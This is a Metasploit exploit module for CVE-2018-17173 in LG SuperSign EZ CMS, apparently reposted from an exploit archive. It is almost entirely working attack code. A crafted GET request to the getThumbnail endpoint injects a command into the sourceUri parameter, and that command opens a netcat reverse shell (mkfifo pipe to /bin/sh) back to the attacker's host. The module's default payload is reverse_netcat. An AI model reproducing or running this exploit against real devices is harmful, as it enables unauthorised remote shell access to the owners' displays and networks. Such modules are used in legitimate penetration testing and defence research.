ExploitFixes
LG Supersign EZ CMS - Remote Code Execution (Metasploit) 2019-05-06 21:05:16

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => 'LG Supersign EZ CMS RCE',
'Description' => %q{
LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone
to remote code execution due to an improper parameter handling
},
'Author' => ['Alejandro Fanjul'],
'References' =>
[
[ 'CVE', '2018-17173' ],
[ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 21 2018'
)
)
register_options(
[
OptString.new('RPORT',[true,'Target port','9080'])
], self.class)

end


def exploit
lhost=datastore['LHOST']
lport=datastore['LPORT']
#uri = target_uri.path
cmd = Rex::Text.uri_encode(payload.encoded)
connect
res = send_request_raw({
'method'=>'GET',
'uri'=>"/qsr_server/device/getThumbnail?sourceUri=' -;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport.to_s+" >/tmp/f;'&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150"

})
handler
disconnect

end

end